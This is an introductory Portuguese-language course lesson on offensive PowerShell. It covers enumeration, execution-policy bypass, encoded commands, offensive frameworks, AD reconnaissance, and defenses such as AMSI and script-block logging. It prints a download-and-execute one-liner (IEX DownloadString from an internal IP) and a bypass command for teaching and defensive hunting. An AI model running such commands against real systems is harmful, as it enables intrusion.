0Pricing
Ethical Hacking Academy · Aula

PowerShell para atacantes

PowerShell ofensivo

PowerShell para atacantes é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 4 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.

Por que PowerShell

O PowerShell vem integrado ao Windows, tem integração profunda com o OS e o .NET e é considerado confiável pelos administradores. Isso faz dele uma ferramenta favorita de uso dos recursos nativos do sistema por invasores — sem necessidade de instalar malware.

Esta lição aborda conceitos de PowerShell ofensivo que você precisa entender para atacar e defender o Windows.

Comandos e o Pipeline

Os comandos do PowerShell são cmdlets no formato Verbo-Substantivo. Eles passam objetos avançados — não apenas texto — pelo pipeline, tornando a enumeração poderosa.

Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, Id

Enumeração do Sistema

Os invasores usam comandos integrados para examinar rapidamente um host — usuários, serviços, rede e atualizações.

Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State Listen

A Política de Execução Não é Segurança

A política de execução restringe a execução de arquivos de script, mas não é um limite de segurança. Muitos parâmetros simples permitem contorná-la, portanto os defensores não devem depender dela.

powershell -ExecutionPolicy Bypass -File script.ps1

Baixar e Executar

Uma técnica comum busca uma carga útil e a executa na memória, deixando poucos vestígios no disco. Por isso, o monitoramento da rede e do AMSI é importante.

IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')

Comandos Codificados

O parâmetro -EncodedCommand executa PowerShell codificado em Base64, sendo frequentemente usado para ocultar a intenção de uma inspeção casual e de filtros simples.

Os defensores decodificam esses comandos a partir dos registros para revelar o que realmente foi executado.

powershell -EncodedCommand <base64-here>

Estruturas Ofensivas

Os conjuntos de ferramentas maduros baseiam-se nestes recursos básicos:

  • PowerSploit / PowerView — enumeração de AD e pós-exploração.
  • Empire / Covenant — comando e controle.
  • Nishang — scripts ofensivos.

Atualmente, a maioria é amplamente identificada pelas assinaturas das defesas.

Reconhecimento do Active Directory

Em um domínio, o PowerShell (PowerView ou o módulo de AD) mapeia usuários, grupos e relações de confiança — a base para encontrar um caminho até o administrador do domínio.

Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'

AMSI e Registros

A Microsoft adicionou defesas específicas contra o uso indevido do PowerShell:

  • AMSI (Interface de Verificação Antimalware) verifica o conteúdo dos scripts antes da execução.
  • Registro de Blocos de Script registra o que é executado.
  • Modo de Linguagem Restrita limita recursos perigosos.

Os invasores tentam contornar o AMSI; os defensores monitoram os registros.

Caça Defensiva

As equipes de defesa procuram PowerShell malicioso verificando:

  • Comandos codificados ou ofuscados.
  • Buscas de rede com DownloadString / IEX.
  • Processos pai incomuns (o Office iniciando o PowerShell).
  • Registros de blocos de script do AMSI e do ID de Evento 4104.

Use de Forma Ética

Essas técnicas são poderosas e correspondem diretamente a invasões reais. Execute-as somente em seu próprio laboratório ou com autorização explícita por escrito.

Praticar o lado defensivo — ler registros e identificar ocorrências do AMSI — é tão valioso quanto praticar o lado ofensivo.

Verificação Rápida

Avalie a política de execução como um controle.

Recapitulação

Você explorou o PowerShell ofensivo:

  • Cmdlets baseados em objetos tornam a enumeração poderosa e discreta (uso dos recursos nativos do sistema).
  • Baixar e executar, comandos codificados e estruturas como PowerView/Empire.
  • A política de execução não é segurança; AMSI e o registro de blocos de script são as verdadeiras defesas.
  • Opere sempre de forma ética e estude o lado defensivo.

Isso conclui o curso de Fundamentos Internos do Windows.

Perguntas Frequentes

A aula “PowerShell para atacantes” é grátis?

Sim — o texto completo de “PowerShell para atacantes” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.

O que vou aprender em “PowerShell para atacantes”?

PowerShell ofensivo Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Ethical Hacking Academy?

Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 4 de 4.

Quanto tempo leva a aula “PowerShell para atacantes”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Ethical Hacking Academy?

Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Arquitetura do Windows
  2. O Registro
  3. Autenticação do Windows
  4. PowerShell para atacantes
← Voltar para Ethical Hacking Academy